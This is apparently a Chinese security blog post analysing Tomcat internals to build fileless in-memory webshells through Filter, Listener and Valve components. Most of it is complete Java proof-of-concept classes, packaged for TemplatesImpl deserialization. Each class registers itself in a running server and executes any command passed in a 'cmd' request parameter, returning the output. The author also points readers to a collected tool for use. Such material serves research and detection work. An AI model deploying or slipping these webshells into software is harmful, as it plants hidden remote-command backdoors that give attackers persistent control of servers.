Tomcat 内存马技术的实现依赖于Servlet 3.0版本之后的动态注册组件,而 Tomcat 7.x 版本才开始支持Servlet 3.0
Tomcat JavaMemShell re(NO JSP)
内存马基础及servlet内存马
https://godownio.github.io/2025/02/25/servlet-nei-cun-ma-re
filter内存马
在《servlet内存马re》对Tomcat从Http11Processor.service解析到servlet.service做了全流程分析。https://godownio.github.io/2025/02/25/servlet-nei-cun-ma-re/
然后在《Tomcat下获取StandardContext的方法(JSP转Java内存马)》对jsp如何转java内存马做了详细解释
其中有提到,在StandardWrapperValve.invoke中,如果servlet或者filterChain不为空,则调用filterChain.doFilter
跟进到ApplicationFilterChain.internalDoFilter内,先是把filterConfig赋为filters[],然后filterConfig.getFilter从filterConfig内取filter,最后doFilter
所以完全可以修改filterConfig内的filter实例完成注册内存马。我们重点关注filter是怎么注册进当前环境的
向上追溯到调用ApplicationFilterFactory.createFilterChain
首先,如果参数request是Request的子类,在没有开启全局安全选项时,调用request.getFilterChain()获取当前的FilterChain
然后从当前的StandardContext内,调用findFilterMaps取出filterMaps
接下来有两个for循环,作用如下:
- 遍历所有过滤器映射,添加与请求路径匹配的过滤器到过滤器链。
- 再次遍历所有过滤器映射,添加与Servlet名称匹配的过滤器到过滤器链。
但是不用管作用,只需要知道filterConfig通过StandardContext.findFilterConfig创建,且是用addFilter添加进filterChain
也许有的读者看到这会想,为什么不自己创建一个filterChain呢?因为filterChain是函数内部创建的变量,反射不能创建,也就影响不了后面的filterChain.doFilter
注意到以上部分都发生在createFilterChain中,而每次有http请求进来,都会调用到createFilterChain。所以可以想办法每次createFilterChain过程中addFilter添加恶意的filterConfig
因为filterConfig来自StandardContext.findFilterConfig(filterMap.getFilterName())
跟进发现就是从静态变量filterConfigs中取出
所以我们需要修改两个点:
- StandardContext的静态变量filterConfigs
- 参数filterMap
将恶意filterConfigs放进StandardContext
到这里就有很大的选择空间了,一个是自己反射改filterConfigs
另一个,因为filterConfigs是个private HashMap,在类里肯定有put的地方,查找到在filterStart
可以看到filterConfigs.put的参数是name和filterConfig,而这两个参数都来自循环的中的filterDefs
filterDefs可以用addFilterDef添加
赋值的话,打个断点看看正常的FilterDef是什么,下面是个叫Tomcat WebSocket (JSR356) Filter 的 filterDefs
由此可见我们需要设置三个值,所以创建恶意filterConfig并注册进standardContext的代码如下:
1
2
3
4
5
6
7
| FilterMemShell filterMemShell = new FilterMemShell();
FilterDef filterDef = new FilterDef();
filterDef.setFilter(filterMemShell);
filterDef.setFilterName("filterMemShell");
filterDef.setFilterClass(filterMemShell.getClass().getName());
standardContext.addFilterDef(filterDef);
standardContext.filterStart();
|
修改参数filterMap
参数filterMap来自filterMaps
filterMaps来自StandardContext.findFilterMaps
注意到filterMaps分别有add和addBefore可以添加。首先要知道,filter是作为一个链,放到前面的filter肯定先执行。很可能有情况是前面的filter执行了然后跳出chain,从而执行不到后面的filter。所以最好调用addBefore
也就是调用addFilterMapBefore
同样打个断点看看filterMap具体怎么封装的
其中有几个都是初始化自带的
dispatcherMapping用setDispatcher,参数肯定是DispatcherType.REQUEST.name()
于是修改filterMap参数代码如下:
1
2
3
4
5
| FilterMap filterMap = new FilterMap();
filterMap.setDispatcher(DispatcherType.REQUEST.name());
filterMap.setFilterName("filterMemShell");
filterMap.addURLPattern("/*");
standardContext.addFilterMapBefore(filterMap);
|
记得filter一定要实现Filter接口的所有方法啊,而且不要调用super!我就是只实现了doFilter,然后IDEA不报错。结果在初始化filter,调用filter.init时报AbstractMethodError,也就是直接调用了接口或抽象类的方法,super也会报错
如下,会报错:
1
2
3
4
| @Override
public void init(FilterConfig filterConfig) throws ServletException {
Filter.super.init(filterConfig);
}
|
不要super:
1
2
3
| @Override
public void init(FilterConfig filterConfig) throws ServletException {
}
|
filter内存马JAVA TemplatesImpl版:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
| package org.example.tomcatmemshell.Filter;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.apache.catalina.Context;
import org.apache.catalina.WebResourceRoot;
import org.apache.catalina.core.*;
import org.apache.catalina.loader.WebappClassLoaderBase;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;
import javax.servlet.*;
import java.io.IOException;
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;
import java.util.Enumeration;
public class FilterMemShell extends AbstractTranslet implements Filter {
private String message;
static {
try {
StandardContext standardContext = getStandardContext2();
if(standardContext != null){
FilterMemShell filterMemShell = new FilterMemShell();
FilterDef filterDef = new FilterDef();
filterDef.setFilter(filterMemShell);
filterDef.setFilterName("filterMemShell");
filterDef.setFilterClass(filterMemShell.getClass().getName());
standardContext.addFilterDef(filterDef);
standardContext.filterStart();
FilterMap filterMap = new FilterMap();
filterMap.setDispatcher(DispatcherType.REQUEST.name());
filterMap.setFilterName("filterMemShell");
filterMap.addURLPattern("/*");
standardContext.addFilterMapBefore(filterMap);
}
} catch (Exception e) {
throw new RuntimeException(e);
}
}
public static StandardContext getStandardContext1() {
try{
WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
Field webappclassLoaderBaseField=Class.forName("org.apache.catalina.loader.WebappClassLoaderBase").getDeclaredField("resources");
webappclassLoaderBaseField.setAccessible(true);
WebResourceRoot resources=(WebResourceRoot) webappclassLoaderBaseField.get(webappClassLoaderBase);
Context StandardContext = resources.getContext();
return (StandardContext) StandardContext;
} catch (NoSuchFieldException e) {
throw new RuntimeException(e);
} catch (ClassNotFoundException e) {
throw new RuntimeException(e);
} catch (IllegalAccessException e) {
throw new RuntimeException(e);
}
}
public static StandardContext getStandardContext2() {
try{
Field WRAP_SOME_OBJECT_FIELD=Class.forName("org.apache.catalina.core.ApplicationDispatcher").getDeclaredField("WRAP_SAME_OBJECT");
Field lastServicedRequestfield= ApplicationFilterChain.class.getDeclaredField("lastServicedRequest");
Field lastServicedResponsefield=ApplicationFilterChain.class.getDeclaredField("lastServicedResponse");
WRAP_SOME_OBJECT_FIELD.setAccessible(true);
lastServicedRequestfield.setAccessible(true);
lastServicedResponsefield.setAccessible(true);
java.lang.reflect.Field modifiersfield= Field.class.getDeclaredField("modifiers");
modifiersfield.setAccessible(true);
modifiersfield.setInt(WRAP_SOME_OBJECT_FIELD,WRAP_SOME_OBJECT_FIELD.getModifiers() & ~Modifier.FINAL);
modifiersfield.setInt(lastServicedRequestfield,lastServicedRequestfield.getModifiers() & ~Modifier.FINAL);
modifiersfield.setInt(lastServicedResponsefield,lastServicedResponsefield.getModifiers() & ~Modifier.FINAL);
if(!WRAP_SOME_OBJECT_FIELD.getBoolean(null)){
WRAP_SOME_OBJECT_FIELD.setBoolean(null,true);
lastServicedResponsefield.set(null,new ThreadLocal<ServletResponse>());
lastServicedRequestfield.set(null,new ThreadLocal<ServletRequest>());
return null;
}else{
ThreadLocal<ServletRequest> threadLocalReq= (ThreadLocal<ServletRequest>)lastServicedRequestfield.get(null);
ThreadLocal<ServletResponse> threadLocalResp=(ThreadLocal<ServletResponse>) lastServicedResponsefield.get(null);
ServletRequest servletRequest = threadLocalReq.get();
ServletResponse servletResponse = threadLocalResp.get();
ApplicationContextFacade applicationContextFacade = (ApplicationContextFacade) servletRequest.getServletContext();
Field applicationContextFacadeField = applicationContextFacade.getClass().getDeclaredField("context");
applicationContextFacadeField.setAccessible(true);
ApplicationContext applicationContext = (ApplicationContext) applicationContextFacadeField.get(applicationContextFacade);
Field standardContextField = applicationContext.getClass().getDeclaredField("context");
standardContextField.setAccessible(true);
StandardContext standardContext = (StandardContext) standardContextField.get(applicationContext);
System.out.println(servletRequest);
return standardContext;
}
}
catch (Exception e){
e.printStackTrace();
}
return null;
}
@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
@Override
public void init(FilterConfig filterConfig) throws ServletException {
Filter.super.init(filterConfig);
}
@Override
public void destroy() {
Filter.super.destroy();
}
@Override
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain chain) throws IOException, ServletException {
System.out.println(
"TomcatShellInject doFilter.....................................................................");
String cmdParamName = "cmd";
String cmd;
if ((cmd = servletRequest.getParameter(cmdParamName)) != null){
Process process = Runtime.getRuntime().exec(cmd);
java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
new java.io.InputStreamReader(process.getInputStream()));
StringBuilder stringBuilder = new StringBuilder();
String line;
while ((line = bufferedReader.readLine()) != null) {
stringBuilder.append(line + '\n');
}
servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());
servletResponse.getOutputStream().flush();
servletResponse.getOutputStream().close();
return;
}
chain.doFilter
(servletRequest, servletResponse);
}
}
|
jsp版很好写,自己写
listener内存马
在 Apache Tomcat 中,Listener(监听器)是一种用于监听特定事件(如应用程序启动、请求创建、会话销毁等)的组件。它们基于 Servlet 规范,允许开发者在事件发生时执行自定义逻辑,例如初始化资源、日志记录、安全检查等。
如果在Tomcat要引入listener,需要实现两种接口,分别是LifecycleListener和原生EvenListener。
实现了LifecycleListener接口的监听器一般作用于tomcat初始化启动阶段,此时客户端的请求还没进入解析阶段,不适合用于内存马。
由上可知,构造内存马应该选用监听HTTP请求的ServletRequestListener (GPT真好用捏~)
Listener可以在web.xml配置,也可以用@WebListener注解配置
1
2
3
| <listener>
<listener-class>com.example.MyContextListener</listener-class>
</listener>
|
1
2
| @WebListener
public class MyContextListener implements ServletContextListener { ... }
|
写个demo继承 ServletRequestListener接口,用注解装配。然后在requestInitialized打上断点
1
2
3
4
5
6
7
8
9
10
11
12
13
| @WebListener("/hello-listener")
public class HelloListener implements ServletRequestListener {
@Override
public void requestDestroyed(ServletRequestEvent sre) {
}
@Override
public void requestInitialized(ServletRequestEvent sre) {
System.out.println("Listener 被调用");
}
}
|
跟进到StandardHostValve.invoke,在context.bind装配完context后,调用了firstRequestInitEvent
后面就有context.getPipeline().getFirst().invoke(request, response),指向StandardWrapperValve.invoke,很显然这个invoke就会执行Filter->Servlet。所以这几个组件的执行顺序是Listener -> Filter -> Servlet
fireRequestInitEvent中,先是调用getApplicationEventListeners获取Listener,然后强转为ServletRequestListener,然后调用其requestInitialized方法
跟进到getApplicationEventListeners看看从哪获取的Listener
有getter就有setter,直接调用addApplicationEventListener或者setter(直接修改Listeners组,容易打崩正常业务),就能完成Listener内存马的注入
POC:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
| package org.example.tomcatmemshell.Listener;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.apache.catalina.Context;
import org.apache.catalina.WebResourceRoot;
import org.apache.catalina.connector.Request;
import org.apache.catalina.connector.RequestFacade;
import org.apache.catalina.core.ApplicationContext;
import org.apache.catalina.core.ApplicationContextFacade;
import org.apache.catalina.core.ApplicationFilterChain;
import org.apache.catalina.core.StandardContext;
import org.apache.catalina.loader.WebappClassLoaderBase;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;
import org.example.tomcatmemshell.Filter.FilterMemShell;
import javax.servlet.*;
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;
public class ListenerMemShell extends AbstractTranslet implements ServletRequestListener {
static {
try {
StandardContext standardContext = getStandardContext2();
if(standardContext != null){
standardContext.addApplicationEventListener(new ListenerMemShell());
}
} catch (Exception e) {
throw new RuntimeException(e);
}
}
@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
@Override
public void requestDestroyed(ServletRequestEvent sre) {}
@Override
public void requestInitialized(ServletRequestEvent sre) {
System.out.println(
"TomcatShellInject Listener requestInitialized.....................................................................");
String cmdParamName = "cmd";
String cmd;
try {
RequestFacade servletRequest = (RequestFacade) sre.getServletRequest();
Field requestFacade = RequestFacade.class.getDeclaredField("request");
requestFacade.setAccessible(true);
Request request = (Request) requestFacade.get(servletRequest);
ServletResponse servletResponse = request.getResponse();
if ((cmd = servletRequest.getParameter(cmdParamName)) != null) {
Process process = Runtime.getRuntime().exec(cmd);
java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
new java.io.InputStreamReader(process.getInputStream()));
StringBuilder stringBuilder = new StringBuilder();
String line;
while ((line = bufferedReader.readLine()) != null) {
stringBuilder.append(line + '\n');
}
servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());
servletResponse.getOutputStream().flush();
servletResponse.getOutputStream().close();
return;
}
}catch (Exception e){
e.printStackTrace();
}
}
public static StandardContext getStandardContext1() {
try{
WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
Field webappclassLoaderBaseField=Class.forName("org.apache.catalina.loader.WebappClassLoaderBase").getDeclaredField("resources");
webappclassLoaderBaseField.setAccessible(true);
WebResourceRoot resources=(WebResourceRoot) webappclassLoaderBaseField.get(webappClassLoaderBase);
Context StandardContext = resources.getContext();
return (StandardContext) StandardContext;
} catch (NoSuchFieldException e) {
throw new RuntimeException(e);
} catch (ClassNotFoundException e) {
throw new RuntimeException(e);
} catch (IllegalAccessException e) {
throw new RuntimeException(e);
}
}
public static StandardContext getStandardContext2() {
try{
Field WRAP_SOME_OBJECT_FIELD=Class.forName("org.apache.catalina.core.ApplicationDispatcher").getDeclaredField("WRAP_SAME_OBJECT");
Field lastServicedRequestfield= ApplicationFilterChain.class.getDeclaredField("lastServicedRequest");
Field lastServicedResponsefield=ApplicationFilterChain.class.getDeclaredField("lastServicedResponse");
WRAP_SOME_OBJECT_FIELD.setAccessible(true);
lastServicedRequestfield.setAccessible(true);
lastServicedResponsefield.setAccessible(true);
java.lang.reflect.Field modifiersfield= Field.class.getDeclaredField("modifiers");
modifiersfield.setAccessible(true);
modifiersfield.setInt(WRAP_SOME_OBJECT_FIELD,WRAP_SOME_OBJECT_FIELD.getModifiers() & ~Modifier.FINAL);
modifiersfield.setInt(lastServicedRequestfield,lastServicedRequestfield.getModifiers() & ~Modifier.FINAL);
modifiersfield.setInt(lastServicedResponsefield,lastServicedResponsefield.getModifiers() & ~Modifier.FINAL);
if(!WRAP_SOME_OBJECT_FIELD.getBoolean(null)){
WRAP_SOME_OBJECT_FIELD.setBoolean(null,true);
lastServicedResponsefield.set(null,new ThreadLocal<ServletResponse>());
lastServicedRequestfield.set(null,new ThreadLocal<ServletRequest>());
return null;
}else{
ThreadLocal<ServletRequest> threadLocalReq= (ThreadLocal<ServletRequest>)lastServicedRequestfield.get(null);
ThreadLocal<ServletResponse> threadLocalResp=(ThreadLocal<ServletResponse>) lastServicedResponsefield.get(null);
ServletRequest servletRequest = threadLocalReq.get();
ServletResponse servletResponse = threadLocalResp.get();
ApplicationContextFacade applicationContextFacade = (ApplicationContextFacade) servletRequest.getServletContext();
Field applicationContextFacadeField = applicationContextFacade.getClass().getDeclaredField("context");
applicationContextFacadeField.setAccessible(true);
ApplicationContext applicationContext = (ApplicationContext) applicationContextFacadeField.get(applicationContextFacade);
Field standardContextField = applicationContext.getClass().getDeclaredField("context");
standardContextField.setAccessible(true);
StandardContext standardContext = (StandardContext) standardContextField.get(applicationContext);
System.out.println(servletRequest);
return standardContext;
}
}
catch (Exception e){
e.printStackTrace();
}
return null;
}
}
|
Valve内存马
valve(阀门)型内存马与之前的三种内存马都不太一样,最显著的区别就是listener->filter->servlet这是一条完整的处理网络请求的流程,valve并不在这一条路上。所以Valve内存马是独属于Tomcat的内存马(比如Weblogic 、Jetty就没有)
经典老图:
通过之前从Http11Processor逐步分析代码可以看到
1
2
3
4
5
6
7
8
9
10
11
| Http11Protocol.service() -> getAdapter().service()获取CoyoteAdapter
connector.getService().getContainer().getPipeline().getFirst().invoke(request, response); —> StandardEngineValve.invoke()
StandardEngineValve.invoke() -> Request.getHost() (得到StandardHost) host.getPipeline().getFirst().invoke() -> StandardHostValve.invoke()
StandardHostValve.invoke() -> request.getContext() (得到StandardContext) context.getPipeline().getFirst().invoke() -> StandardContextValue.invoke()
StandardContextValue.invoke() -> request.getWrapper() (得到StandardWrapper) wrapper.getPipeline().getFirst().invoke() -> StandardWrapperValve.invoke
|
完美对应了上图。
这其中每一步都会调用到getPipeline去获取StandardPipeline
再一次跟进到connector.getService().getContainer().getPipeline()内,发现调用类为ContainerBase
同时,根据上面的链子,StandardEngine、StandardHost、StandardContext、StandardWrapper都会调用getPipeline,很显然这四个类都继承了ContainerBase
而每一个getPipeline之后都会调用getFirst()
这意味着,一个Pipeline里不止一条信息,如果first不为空就返回first,否则返回basic。从这里大致能猜出,每个Pipeline实际上是个链表
我们看到同样在StandardPipeline包下的一个函数addValve:
如果当前Pipeline没有Valve(first为null),则将新Valve设置为第一个,并将其next指向basic。
如果已有Valve,则遍历链表,找到最后一个Valve(其next为basic),将新Valve插入到该位置,并将其next指向basic。
所以我们可以通过addValve来添加一个自定义的valve到Pipeline,使getFirst返回它
解决了怎么添加Valve的问题,下面想在哪添加的问题。总之,内存马的构造都是解决两个问题:在哪添加,怎么添加
很显然只要能反射获取当前的StandardEngine、StandardHost、StandardContext、StandardWrapper,那么在以上任意一个组件中添加都可以
一个Valve该怎么写?看看StandardContextValve就可以了,继承了ValveBase
ValveBase又实现了Valve接口,那自定义Valve也实现这个接口就行了
比如在StandardContext中添加Valve POC:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
| package org.example.tomcatmemshell.Valve;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.apache.catalina.Context;
import org.apache.catalina.Pipeline;
import org.apache.catalina.Valve;
import org.apache.catalina.WebResourceRoot;
import org.apache.catalina.connector.Request;
import org.apache.catalina.connector.RequestFacade;
import org.apache.catalina.connector.Response;
import org.apache.catalina.core.*;
import org.apache.catalina.loader.WebappClassLoaderBase;
import org.apache.catalina.valves.ValveBase;
import org.example.tomcatmemshell.Listener.ListenerMemShell;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import java.io.IOException;
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;
public class ValveMemShell1 extends AbstractTranslet implements Valve {
@Override
public Valve getNext() {
return null;
}
@Override
public void setNext(Valve valve) {
}
@Override
public void backgroundProcess() {
}
@Override
public void invoke(Request request, Response response) throws IOException, ServletException {
System.out.println(
"TomcatShellInject Valve invoke.....................................................................");
String cmdParamName = "cmd";
String cmd;
try {
if ((cmd = request.getParameter(cmdParamName)) != null) {
Process process = Runtime.getRuntime().exec(cmd);
java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
new java.io.InputStreamReader(process.getInputStream()));
StringBuilder stringBuilder = new StringBuilder();
String line;
while ((line = bufferedReader.readLine()) != null) {
stringBuilder.append(line + '\n');
}
response.getOutputStream().write(stringBuilder.toString().getBytes());
response.getOutputStream().flush();
response.getOutputStream().close();
return;
}
}catch (Exception e){
e.printStackTrace();
}
}
@Override
public boolean isAsyncSupported() {
return false;
}
static {
try {
StandardContext standardContext = getStandardContext2();
if(standardContext != null){
Pipeline standardPipeline = standardContext.getPipeline();
Valve[] valves = standardPipeline.getValves();
boolean hasValveShell = false;
Valve valveShell = new ValveMemShell1();
for (Valve valve : valves) {
if (valve.getClass().equals(valveShell.getClass())) {
hasValveShell = true;
break;
}
}
if (!hasValveShell) {
standardPipeline.addValve(valveShell);
}
}
} catch (Exception e) {
throw new RuntimeException(e);
}
}
public static StandardContext getStandardContext1() {
try{
WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
Field webappclassLoaderBaseField=Class.forName("org.apache.catalina.loader.WebappClassLoaderBase").getDeclaredField("resources");
webappclassLoaderBaseField.setAccessible(true);
WebResourceRoot resources=(WebResourceRoot) webappclassLoaderBaseField.get(webappClassLoaderBase);
Context StandardContext = resources.getContext();
return (StandardContext) StandardContext;
} catch (NoSuchFieldException e) {
throw new RuntimeException(e);
} catch (ClassNotFoundException e) {
throw new RuntimeException(e);
} catch (IllegalAccessException e) {
throw new RuntimeException(e);
}
}
public static StandardContext getStandardContext2() {
try{
Field WRAP_SOME_OBJECT_FIELD=Class.forName("org.apache.catalina.core.ApplicationDispatcher").getDeclaredField("WRAP_SAME_OBJECT");
Field lastServicedRequestfield= ApplicationFilterChain.class.getDeclaredField("lastServicedRequest");
Field lastServicedResponsefield=ApplicationFilterChain.class.getDeclaredField("lastServicedResponse");
WRAP_SOME_OBJECT_FIELD.setAccessible(true);
lastServicedRequestfield.setAccessible(true);
lastServicedResponsefield.setAccessible(true);
java.lang.reflect.Field modifiersfield= Field.class.getDeclaredField("modifiers");
modifiersfield.setAccessible(true);
modifiersfield.setInt(WRAP_SOME_OBJECT_FIELD,WRAP_SOME_OBJECT_FIELD.getModifiers() & ~Modifier.FINAL);
modifiersfield.setInt(lastServicedRequestfield,lastServicedRequestfield.getModifiers() & ~Modifier.FINAL);
modifiersfield.setInt(lastServicedResponsefield,lastServicedResponsefield.getModifiers() & ~Modifier.FINAL);
if(!WRAP_SOME_OBJECT_FIELD.getBoolean(null)){
WRAP_SOME_OBJECT_FIELD.setBoolean(null,true);
lastServicedResponsefield.set(null,new ThreadLocal<ServletResponse>());
lastServicedRequestfield.set(null,new ThreadLocal<ServletRequest>());
return null;
}else{
ThreadLocal<ServletRequest> threadLocalReq= (ThreadLocal<ServletRequest>)lastServicedRequestfield.get(null);
ThreadLocal<ServletResponse> threadLocalResp=(ThreadLocal<ServletResponse>) lastServicedResponsefield.get(null);
ServletRequest servletRequest = threadLocalReq.get();
ServletResponse servletResponse = threadLocalResp.get();
ApplicationContextFacade applicationContextFacade = (ApplicationContextFacade) servletRequest.getServletContext();
Field applicationContextFacadeField = applicationContextFacade.getClass().getDeclaredField("context");
applicationContextFacadeField.setAccessible(true);
ApplicationContext applicationContext = (ApplicationContext) applicationContextFacadeField.get(applicationContextFacade);
Field standardContextField = applicationContext.getClass().getDeclaredField("context");
standardContextField.setAccessible(true);
StandardContext standardContext = (StandardContext) standardContextField.get(applicationContext);
System.out.println(servletRequest);
return standardContext;
}
}
catch (Exception e){
e.printStackTrace();
}
return null;
}
@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
}
|
比如在StandardHost处插入Valve
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| static {
try {
StandardContext standardContext = getStandardContext2();
if(standardContext != null){
StandardHost standardHost = (StandardHost) standardContext.getParent();
Pipeline standardPipeline = standardHost.getPipeline();
Valve[] valves = standardPipeline.getValves();
boolean hasValveShell = false;
Valve valveShell = new ValveMemShell2();
for (Valve valve : valves) {
if (valve.getClass().equals(valveShell.getClass())) {
hasValveShell = true;
break;
}
}
if (!hasValveShell) {
standardPipeline.addValve(valveShell);
}
}
} catch (Exception e) {
throw new RuntimeException(e);
}
}
|
实测可用
OK,现在考你们一个问题,如果此处pipeline不是add添加,而是set修改,那么修改哪个地方的xxx.getPipeline会影响比较小?理论推导一下
如果是set,我们依然可以选择修改以上四个getPipeline的任意一个,但是为了最小化影响Tomcat,理论上我们应该选择修改链上的最后一个,也就是StandardWrapper.getPipeline的结果。
与此同时,修改了StandardContext Pipeline或者StandardWrapper Pipeline意味着该链之后的程序都无法正常执行,比如StandardWrapperValve里原本的Filter和servlet
因为Listener在StandardHostValve触发的原因,修改以上两个Pipeline还无法影响到正常的Listener。但是如果修改StandardEngine、StandardHost则会把原本的Listener也给挤掉
答案是StandardContext 和 StandardWrapper :)
至此,Tomcat下TemplatesImpl字节码所需的servlet 、Filter 、Listener、Valve 内存马,以及三个通用内存马,以及单回显JNIMemShell全部集成于My TomcatMemShell,欢迎使用
https://github.com/godownio/TomcatMemshell
